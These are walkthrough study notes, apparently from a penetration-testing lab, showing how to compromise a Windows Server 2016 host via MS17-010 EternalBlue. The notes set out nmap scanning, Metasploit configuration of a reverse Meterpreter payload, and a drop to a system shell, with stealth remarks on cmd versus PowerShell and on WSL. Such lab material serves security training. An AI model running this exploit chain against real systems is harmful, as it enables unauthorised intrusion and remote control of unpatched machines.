🛠️ MS17-010 EternalBlue

🔎 1. Enumerate the Host

Use nmap to discover open ports and services:

nmap -v -A 10.129.201.97

Findings:

Open Ports: 80 (IIS 10.0), 135 (RPC), 139 (NetBIOS), 445 (SMB)
Host OS: Windows Server 2016 Standard 14393
Hostname: SHELLS-WINBLUE
Workgroup: WORKGROUP

🎯 2. Search for Vulnerability (MS17-010 EternalBlue)

Use Metasploit to identify if the host is vulnerable:

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.129.201.97
run

Result:

[+] Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard 14393 x64

💥 3. Choose & Configure Exploit + Payload

Search for EternalBlue exploits:

search eternal

Choose:

use exploit/windows/smb/ms17_010_psexec

Set exploit options:

set RHOSTS 10.129.201.97
set LHOST 10.10.14.12
set LPORT 4444

Optional (not used here but useful):

set SMBUser <username>
set SMBPass <password>

🚀 4. Execute Exploit

exploit

Success Output:

[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.129.201.97:50215)

💻 5. Post-Exploitation Access

Check user privileges:

meterpreter > getuid

Drop into system shell:

meterpreter > shell

Expected output:

C:\Windows\system32>

🧠 Understanding Windows Shells

CMD (cmd.exe)

PowerShell (powershell.exe)

Lightweight and legacy shell

Modern shell with .NET support

Minimal tracing/logging

Keeps command history (less stealthy)

Fewer capabilities

Supports complex scripts, cmdlets, objects

Present on older systems (pre-Win7)

Only present from Windows 7 onward

Works well with .bat files

Best for advanced automation or interacting with APIs

Tip: Use help or observe prompt:

C:\> → CMD
PS C:\> → PowerShell

🐧 WSL and PowerShell for Linux (⚠️ Advanced Topics)

WSL (Windows Subsystem for Linux):
- Enables running Linux binaries on Windows.
- Some malware uses WSL to install payloads.
- WSL network traffic may bypass Windows Firewall/Defender.
PowerShell Core on Linux:
- Provides cross-platform shell functionality.
- Could be abused for stealthy attacks on hybrid environments.

💡 Summary: Tools Used

Tools:

nmap – Scanning & banner grabbing
msfconsole – Exploitation & payload delivery
meterpreter – Post-exploitation shell
Windows Shells: cmd.exe and powershell.exe

Commands Summary:

Action

Command

Scan with Nmap

nmap -v -A <target-ip>

Banner grabbing

nmap -v --script banner.nse <target-ip>

Launch Metasploit

msfconsole

Search EternalBlue

search eternal

Set exploit module

use exploit/windows/smb/ms17_010_psexec

Configure exploit

set RHOSTS <target-ip>, set LHOST, set LPORT

Run the exploit

exploit

Meterpreter commands

getuid, shell

Would you like a PDF version of these notes or another format?

PreviousInfiltrating Windows NextInfiltrating Unix/Linux

Last updated 10 months ago

hashtag🔎 1. Enumerate the Host

hashtag🎯 2. Search for Vulnerability (MS17-010 EternalBlue)

hashtag💥 3. Choose & Configure Exploit + Payload

hashtag🚀 4. Execute Exploit

hashtag💻 5. Post-Exploitation Access

hashtag🧠 Understanding Windows Shells

hashtag🐧 WSL and PowerShell for Linux (⚠️ Advanced Topics)

hashtag💡 Summary: Tools Used

hashtagTools:

hashtagCommands Summary: